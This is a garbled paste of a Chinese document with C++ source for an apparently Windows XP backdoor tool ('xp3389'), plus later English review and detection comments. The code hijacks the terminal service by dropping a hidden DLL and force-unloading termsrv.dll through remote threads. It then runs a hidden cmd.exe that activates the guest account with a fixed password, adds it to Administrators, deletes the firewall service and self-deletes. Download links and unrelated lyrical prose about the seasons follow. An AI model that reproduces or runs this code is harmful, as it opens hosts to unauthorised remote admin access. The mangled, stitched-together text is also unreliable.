xp下双开3389源码.docx
xp下双开3389源码
//xp3389.cpp:
XP下双开3389的工具CodeByCoolDiyer
#pragmacomment(linker,"/FILEALIGN:
0x200/opt:
nowin98/IGNORE:
4078/MERGE:
.rdata=.text/MERGE:
.data=.text/section:
.text,ERW")
#include"stdafx.h"
#include"resource.h"
#include
#include
// NOTE(review): this listing is a whitespace-stripped paste of an MSVC C++
// file (spaces between tokens are gone, `::` scope operators were split onto
// bare `:` lines, quotes became typographic). Code is kept exactly as found;
// only comments are added.
//
// Returns the PID of the first running process whose image name equals
// szProcName (case-insensitive, lstrcmpi), or NULL (0) when nothing matches
// or the Toolhelp snapshot could not be taken.
// NOTE(review): CreateToolhelp32Snapshot signals failure with
// INVALID_HANDLE_VALUE, not NULL, so `if(hSP)` does not catch that case.
// NOTE(review): the name is shared with the Win32 GetProcessId(HANDLE) API
// (kernel32, XP SP1 and later); in C++ this becomes an overload, which is
// easy to confuse at call sites.
DWORDGetProcessId(LPCTSTRszProcName)
{
PROCESSENTRY32pe;
DWORDdwPid;
DWORDdwRet;
BOOLbFound=FALSE;
HANDLEhSP=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(hSP)
{
pe.dwSize=sizeof(pe);
// The paste lost the `;` after the loop condition `dwRet`; presumably
// `for (dwRet = Process32First(...); dwRet; dwRet = Process32Next(...))`.
for(dwRet=Process32First(hSP,&pe);
dwRet
dwRet=Process32Next(hSP,&pe))
{
if(lstrcmpi(szProcName,pe.szExeFile)==0)
{
dwPid=pe.th32ProcessID;
bFound=TRUE;
break;
}
}
CloseHandle(hSP);
if(bFound==TRUE)
{
returndwPid;
}
}
// Both "not found" and "snapshot failed" collapse to 0 here.
returnNULL;
}
// EnumWindows callback. For every visible top-level window owned by the
// process whose PID was passed in lParam, sends WM_CLOSE (SendMessage is
// synchronous, so this blocks until the window has handled it). Always
// returns true so enumeration continues over all windows.
// NOTE(review): the second argument of GetWindowThreadProcessId receives the
// *process* id, so dwWindowThreadId is misnamed; dwLsassId is assigned and
// never read. WNDENUMPROC returns BOOL, not bool — the (WNDENUMPROC) cast at
// the call sites hides that mismatch.
boolCALLBACKEnumWindowsProc(HWNDhwnd,LPARAMlParam)
{
if(!
IsWindowVisible(hwnd))returntrue;
DWORDdwWindowThreadId=NULL;
DWORDdwLsassId=(DWORD)lParam;
GetWindowThreadProcessId(hwnd,&dwWindowThreadId);
if(dwWindowThreadId==(DWORD)lParam)
{
// close this window belonging to the target process
SendMessage(hwnd,WM_CLOSE,0,0);
}
returntrue;
}
//写注册表的指定键的数据(Mode:
0-新建键数据1-设置键数据2-删除指定键3-删除指定键项)fromNameLess114
// Writes, or deletes, one registry value or key (attributed to NameLess114).
// Mode: 0 - create the key (RegCreateKeyEx) and set the value,
//       1 - open the existing key and set the value,
//       2 - delete subkey Vname under SubKey,
//       3 - delete value Vname under SubKey.
// Type selects the payload for modes 0/1: REG_SZ / REG_EXPAND_SZ write
// szData with its terminator (strlen(szData)+1 bytes, so szData must not be
// NULL for those types); REG_DWORD writes dwData; REG_BINARY is not
// implemented. Returns 1 on success, 0 otherwise.
// NOTE(review): case 0 has no `break`, so it falls through into case 1: the
// handle returned by RegCreateKeyEx is overwritten by RegOpenKeyEx and leaked
// on every mode-0 call. hKey is also never initialised, so a `__leave` before
// any open hands an indeterminate handle to RegCloseKey in __finally.
// NOTE(review): RegCloseKey(MainKey) closes a handle this function does not
// own; the callers in this file pass the predefined HKEY_LOCAL_MACHINE root,
// for which closing is unnecessary.
intWriteRegEx(HKEYMainKey,LPCTSTRSubKey,LPCTSTRVname,DWORDType,char*szData,DWORDdwData,intMode)
{
HKEYhKey;
DWORDdwDisposition;
intiResult=0;
__try
{
//SetKeySecurityEx(MainKey,Subkey,KEY_ALL_ACCESS);
switch(Mode)
{
case0:
if(RegCreateKeyEx(MainKey,SubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,&dwDisposition)!
=ERROR_SUCCESS)
__leave;
// falls through into case 1 (see note above)
case1:
if(RegOpenKeyEx(MainKey,SubKey,0,KEY_READ|KEY_WRITE,&hKey)!
=ERROR_SUCCESS)
__leave;
switch(Type)
{
caseREG_SZ:
caseREG_EXPAND_SZ:
if(RegSetValueEx(hKey,Vname,0,Type,(LPBYTE)szData,strlen(szData)+1)==ERROR_SUCCESS)
iResult=1;
break;
caseREG_DWORD:
if(RegSetValueEx(hKey,Vname,0,Type,(LPBYTE)&dwData,sizeof(DWORD))==ERROR_SUCCESS)
iResult=1;
break;
caseREG_BINARY:
// not implemented: returns 0
break;
}
break;
case2:
if(RegOpenKeyEx(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&hKey)!
=ERROR_SUCCESS)
__leave;
if(RegDeleteKey(hKey,Vname)==ERROR_SUCCESS)
iResult=1;
break;
case3:
if(RegOpenKeyEx(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&hKey)!
=ERROR_SUCCESS)
__leave;
if(RegDeleteValue(hKey,Vname)==ERROR_SUCCESS)
iResult=1;
break;
}
}
__finally
{
RegCloseKey(MainKey);
RegCloseKey(hKey);
}
returniResult;
}
// Enables (bEnable != 0) or disables the named privilege PName on the
// current process token. Returns false if the token cannot be opened or if
// GetLastError() is not ERROR_SUCCESS after AdjustTokenPrivileges (which is
// how ERROR_NOT_ALL_ASSIGNED — privilege not held — is reported).
// NOTE(review): the return value of LookupPrivilegeValue is ignored; if the
// lookup fails, an uninitialised LUID is passed to AdjustTokenPrivileges.
// The return value of AdjustTokenPrivileges itself is also ignored.
boolDebugPrivilege(constchar*PName,BOOLbEnable)
{
BOOLbResult=TRUE;
HANDLEhToken;
TOKEN_PRIVILEGESTokenPrivileges;
if(!
OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY|TOKEN_ADJUST_PRIVILEGES,&hToken))
{
bResult=FALSE;
returnbResult;
}
TokenPrivileges.PrivilegeCount=1;
TokenPrivileges.Privileges[0].Attributes=bEnable?
SE_PRIVILEGE_ENABLED:
0;
LookupPrivilegeValue(NULL,PName,&TokenPrivileges.Privileges[0].Luid);
AdjustTokenPrivileges(hToken,FALSE,&TokenPrivileges,sizeof(TOKEN_PRIVILEGES),NULL,NULL);
// GetLastError is consulted even on a "successful" return: see note above.
if(GetLastError()!
=ERROR_SUCCESS)
{
bResult=FALSE;
}
CloseHandle(hToken);
returnbResult;
}
// Forces module hModuleHandle out of process dwProcessID by creating a thread
// in that process whose start routine is kernel32!FreeLibrary and whose
// argument is the module handle, then waits for that thread to finish.
// Returns false when hModuleHandle is NULL, OpenProcess fails, or
// CreateRemoteThread fails; true otherwise (the remote FreeLibrary's own
// result is not inspected).
// NOTE(review): the FreeLibrary address is resolved in *this* process and
// reused in the target, which only works where kernel32 is mapped at the same
// base in every process (true on XP without ASLR; not on later systems).
// Defender note: CreateRemoteThread into another process is a high-signal
// event (e.g. Sysmon event ID 8) and is the natural detection point for this
// routine.
boolUnloadRemoteModule(DWORDdwProcessID,HANDLEhModuleHandle)
{
HANDLEhRemoteThread;
HANDLEhProcess;
if(hModuleHandle==NULL)returnfalse;
hProcess=:
:
OpenProcess(PROCESS_VM_WRITE|PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION,FALSE,dwProcessID);
if(hProcess==NULL)returnfalse;
HMODULEhModule=:
:
GetModuleHandle(”kernel32.dll”);
LPTHREAD_START_ROUTINEpfnStartRoutine=(LPTHREAD_START_ROUTINE):
:
GetProcAddress(hModule,“FreeLibrary”);
hRemoteThread=:
:
CreateRemoteThread(hProcess,NULL,0,pfnStartRoutine,hModuleHandle,0,NULL);
if(hRemoteThread==NULL)
{
:
:
CloseHandle(hProcess);
returnfalse;
}
:
:
WaitForSingleObject(hRemoteThread,INFINITE);
:
:
CloseHandle(hProcess);
:
:
CloseHandle(hRemoteThread);
returntrue;
}
// Walks the module list of process dwProcessID and returns the HMODULE whose
// full path equals lpModulePath (case-insensitive, lstrcmpi), or NULL when
// no module matches. The handle is returned typed as HANDLE.
// NOTE(review): CreateToolhelp32Snapshot returns INVALID_HANDLE_VALUE on
// failure; that case is not checked, so Module32First and then CloseHandle
// are called on the invalid value.
HANDLEFindModule(DWORDdwProcessID,LPCTSTRlpModulePath)
{
HANDLEhModuleHandle=NULL;
MODULEENTRY32me32={0};
HANDLEhModuleSnap=:
:
CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,dwProcessID);
me32.dwSize=sizeof(MODULEENTRY32);
if(:
:
Module32First(hModuleSnap,&me32))
{
do
{
if(!
lstrcmpi(me32.szExePath,lpModulePath))
{
hModuleHandle=me32.hModule;
break;
}
}while(:
:
Module32Next(hModuleSnap,&me32));
}
:
:
CloseHandle(hModuleSnap);
returnhModuleHandle;
}
// For every process in the system, looks up lpModulePath with FindModule and,
// where it is loaded, asks UnloadRemoteModule to free it.
// NOTE(review): bRet is overwritten on each hit, so the return value reflects
// only the *last* process in which the module was found; earlier failures are
// lost. The snapshot handle is not checked against INVALID_HANDLE_VALUE.
// bRet is a BOOL initialised with the C++ `false` literal.
boolUnloadModule(LPCTSTRlpModulePath)
{
BOOLbRet=false;
PROCESSENTRY32pe32;
pe32.dwSize=sizeof(pe32);
HANDLEhProcessSnap=:
:
CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
// look for the processes that have the module loaded
if(:
:
Process32First(hProcessSnap,&pe32))
{
do
{
HANDLEhModuleHandle=FindModule(pe32.th32ProcessID,lpModulePath);
if(hModuleHandle!
=NULL)
{
bRet=UnloadRemoteModule(pe32.th32ProcessID,hModuleHandle);
}
}while(Process32Next(hProcessSnap,&pe32));
}
CloseHandle(hProcessSnap);
returnbRet;
}
// Opens the SCM, opens service lpService and starts it; all failures are
// silent (no return value, no GetLastError handling).
// NOTE(review): OpenService requests DELETE|SERVICE_START although only
// SERVICE_START is used, and the SCM is opened with SC_MANAGER_CREATE_SERVICE
// although nothing is created — both more access than the code needs.
// NOTE(review): StartService is a macro in winsvc.h (StartServiceA/W), so this
// definition takes the expanded name and coexists with the Win32 function only
// as a C++ overload distinguished by its parameter list; the call on
// `StartService(hService,0,NULL)` below resolves to the Win32 one.
voidStartService(LPCTSTRlpService)
{
SC_HANDLEhSCManager=OpenSCManager(NULL,NULL,SC_MANAGER_CREATE_SERVICE);
if(NULL!
=hSCManager)
{
SC_HANDLEhService=OpenService(hSCManager,lpService,DELETE|SERVICE_START);
if(NULL!
=hService)
{
StartService(hService,0,NULL);
CloseServiceHandle(hService);
}
CloseServiceHandle(hSCManager);
}
}
// Copies the embedded resource (wResourceID, lpType) of this module into the
// file lpFileName, overwriting it (CREATE_ALWAYS). Returns FALSE if the
// resource cannot be found or loaded; TRUE otherwise.
// NOTE(review): CreateFile reports failure with INVALID_HANDLE_VALUE, not
// NULL, so the `hFile==NULL` test never fires and WriteFile/CloseHandle are
// called on an invalid handle when the file cannot be created. The WriteFile
// result and dwBytes are not checked against SizeofResource. The HGLOBAL from
// LoadResource is used directly as the data pointer without LockResource
// (equivalent on Win32, but not the documented contract).
BOOLReleaseResource(WORDwResourceID,LPCTSTRlpType,LPCTSTRlpFileName)
{
HGLOBALhRes;
HRSRChResInfo;
HANDLEhFile;
DWORDdwBytes;
hResInfo=FindResource(NULL,MAKEINTRESOURCE(wResourceID),lpType);
if(hResInfo==NULL)returnFALSE;
hRes=LoadResource(NULL,hResInfo);
if(hRes==NULL)returnFALSE;
hFile=CreateFile(lpFileName,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,
CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
if(hFile==NULL)returnFALSE;
WriteFile(hFile,hRes,SizeofResource(NULL,hResInfo),&dwBytes,NULL);
CloseHandle(hFile);
returnTRUE;
}
// Registry changes applied under HKEY_LOCAL_MACHINE (all via WriteRegEx mode
// 0, return values ignored). The `//` separators in the key paths are the
// document export's rendering of `\\`.
//   Services\TermService            Start = 2 (SERVICE_AUTO_START)
//   ...\Winlogon                    KeepRASConnections = "1"
//   Control\Terminal Server         fDenyTSConnections = 0 (allow RDP)
//   ...\Terminal Server\Licensing Core  EnableConcurrentSessions = 1
//   Services\TermService\Parameters ServiceDll = %SystemRoot%\system32\termsrvhack.dll
// Defender note: the ServiceDll write is the tamper indicator to alert on —
// a service's Parameters\ServiceDll pointing at a file that is not the
// vendor-shipped binary — together with the fDenyTSConnections and
// EnableConcurrentSessions flips on a host where RDP is not expected.
voidSetReg()
{
WriteRegEx(HKEY_LOCAL_MACHINE,“SYSTEM//CurrentControlSet//Services//TermService”,”Start”,REG_DWORD,NULL,2,0);
WriteRegEx(HKEY_LOCAL_MACHINE,“SOFTWARE//Microsoft//WindowsNT//CurrentVersion//Winlogon”,“KeepRASConnections”,REG_SZ,“1″,0,0);
WriteRegEx(HKEY_LOCAL_MACHINE,“SYSTEM//CurrentControlSet//Control//TerminalServer”,“fDenyTSConnections”,REG_DWORD,NULL,0,0);
WriteRegEx(HKEY_LOCAL_MACHINE,“SYSTEM//CurrentControlSet//Control//TerminalServer//LicensingCore”,“EnableConcurrentSessions”,REG_DWORD,NULL,1,0);
WriteRegEx(HKEY_LOCAL_MACHINE,“SYSTEM//CurrentControlSet//Services//TermService//Parameters”,“ServiceDll”,REG_EXPAND_SZ,“%SystemRoot%//system32//termsrvhack.dll”,0,0);
}
// Writes the embedded IDR_DLL resource to <system>\termsrvhack.dll and to
// <system>\dllcache\termsrvhack.dll, then marks both hidden+readonly+system.
// No return values are checked (GetSystemDirectory, ReleaseResource,
// SetFileAttributes).
// NOTE(review): lstrcat appends to MAX_PATH buffers with no length check;
// GetSystemDirectory's returned length is not used to bound the append.
// Defender note: a new DLL in system32 *and* dllcache with hidden/system
// attributes is the file-system indicator that pairs with the ServiceDll
// registry change made in SetReg.
voidReleaseDll()
{
charstrSystemPath[MAX_PATH];
charstrDllcachePath[MAX_PATH];
GetSystemDirectory(strSystemPath,sizeof(strSystemPath));
GetSystemDirectory(strDllcachePath,sizeof(strDllcachePath));
lstrcat(strSystemPath,“//termsrvhack.dll”);
lstrcat(strDllcachePath,“//dllcache//termsrvhack.dll”);
ReleaseResource(IDR_DLL,“BIN”,strSystemPath);
ReleaseResource(IDR_DLL,“BIN”,strDllcachePath);
SetFileAttributes(strSystemPath,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM);
SetFileAttributes(strDllcachePath,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM);
}
// True when GetVersionEx reports major 5 / minor 1, i.e. Windows XP
// (Server 2003 is 5.2 and is excluded).
// NOTE(review): the return value of GetVersionEx is not checked; if it fails,
// the version fields are uninitialised stack data.
boolIsOSXP()
{
OSVERSIONINFOEXOsVerInfoEx;
OsVerInfoEx.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);
GetVersionEx((OSVERSIONINFO*)&OsVerInfoEx);// note the cast: the EX struct is passed as the base type
returnOsVerInfoEx.dwMajorVersion==5&&OsVerInfoEx.dwMinorVersion==1;
}
// Replaces the terminal-service DLL at runtime: drops termsrvhack.dll
// (ReleaseDll), enables SE_DEBUG_NAME, forcibly unloads <system>\termsrv.dll
// from every process that has it loaded (UnloadModule), then spins — with
// SE_SHUTDOWN_NAME enabled — closing the error windows of csrss.exe and of
// drwtsn32.exe and calling AbortSystemShutdown until that call succeeds.
// NOTE(review): the early `return` after a failed UnloadModule leaves
// SE_DEBUG_NAME enabled on the process token (no matching
// DebugPrivilege(SE_DEBUG_NAME,FALSE)).
// NOTE(review): dwLsassId actually holds csrss.exe's PID, and is 0 if
// GetProcessId found no such process; in that case EnumWindows is called
// with lParam 0 every iteration.
// NOTE(review): `while(!AbortSystemShutdown(NULL))` only exits once a
// pending shutdown has been aborted; if none is ever initiated the loop
// never terminates.
voidHijackService()
{
charstrDll[MAX_PATH];
GetSystemDirectory(strDll,sizeof(strDll));
lstrcat(strDll,“//termsrv.dll”);
// drop termsrvhack.dll
ReleaseDll();
// walk all processes and unload the currently loaded DLL
DebugPrivilege(SE_DEBUG_NAME,TRUE);
if(!
UnloadModule(strDll))return;
DebugPrivilege(SE_DEBUG_NAME,FALSE);
// close the error dialogs about to appear, and the automatic-shutdown
// dialog raised because the forced DLL unload made some services terminate
// abnormally
// grant this process the shutdown privilege
DebugPrivilege(SE_SHUTDOWN_NAME,TRUE);
DWORDdwLsassId=GetProcessId(”csrss.exe”);
while(!
AbortSystemShutdown(NULL))
{
// some systems pop up drwtsn32.exe
DWORDdwDrwtsn32Id=GetProcessId(”drwtsn32.exe”);
if(dwDrwtsn32Id!
=NULL)
{
EnumWindows((WNDENUMPROC)EnumWindowsProc,(LPARAM)dwDrwtsn32Id);
}
// the forced module unload raises errors; close the error windows
// shown by csrss.exe
EnumWindows((WNDENUMPROC)EnumWindowsProc,(LPARAM)dwLsassId);
Sleep(10);
}
DebugPrivilege(SE_SHUTDOWN_NAME,FALSE);
}
// Entry point. Applies the registry changes, on XP replaces the
// terminal-service DLL, starts TermService, then runs a hidden cmd.exe
// (WinExec, SW_HIDE) that enables the guest account with a fixed password,
// adds it to the local Administrators group, stops and deletes the
// SharedAccess (XP firewall) service and deletes this executable.
// The stray `previousinstance` on the signature line looks like the remains
// of a `// previous instance` comment lost in the paste.
// NOTE(review): every step's result is ignored; wsprintf formats into a
// 1024-byte buffer (MAX_PATH path, fits) and WinExec is never checked.
// Defender note: the `net user`/`net localgroup administrators`/`net stop
// SharedAccess`/`sc delete` chain launched from a hidden cmd.exe is the
// command-line indicator to look for in process-creation logs.
intWINAPIWinMain(HINSTANCEhInstance,HINSTANCEhPrevInstance,previousinstance
LPSTRlpCmdLine,intnCmdShow)
{
// registry changes
SetReg();
if(IsOSXP())
{
// replace the DLL
HijackService();
}
// start the terminal service
StartService(”TermService”);
// enable guest, add it to the administrators group, self-delete, stop the
// XP built-in firewall and delete its service
charstrCommand[1024];
charstrSelf[MAX_PATH];
GetModuleFileName(NULL,strSelf,sizeof(strSelf));
wsprintf(strCommand,“cmd.exe/cnetuserguest/active:
yes&&netuserguestcooldiyer&&netlocalgroupadministratorsguest/add&&netstopSharedAccess/y&&del/”%s/”&&scdeleteSharedAccess”,strSelf);
WinExec(strCommand,SW_HIDE);
return0;
}
//http:
//201314.free.fr/attachments/200805/xp3389_bin.rar//http:
//201314.free.fr/attachments/200805/xp3389_src.rar
倚窗远眺,目光目光尽处必有一座山,那影影绰绰的黛绿色的影,是春天的颜色。
周遭流岚升腾,没露出那真实的面孔。
面对那流转的薄雾,我会幻想,那里有一个世外桃源。
在天阶夜色凉如水的夏夜,我会静静地,静静地,等待一场流星雨的来临…
许下一个愿望,不乞求去实现,至少,曾经,有那么一刻,我那还未枯萎的,青春的,诗意的心,在我最美的年华里,同星空做了一次灵魂的交流…
秋日里,阳光并不刺眼,天空是一碧如洗的蓝,点缀着飘逸的流云。
偶尔,一片飞舞的落叶,会飘到我的窗前。
斑驳的印迹里,携刻着深秋的颜色。
在一个落雪的晨,这纷纷扬扬的雪,飘落着一如千年前的洁白。
窗外,是未被污染的银白色世界。
我会去迎接,这人间的圣洁。
在这流转的岁月里,有着流转的四季,还有一颗流转的心,亘古不变的心。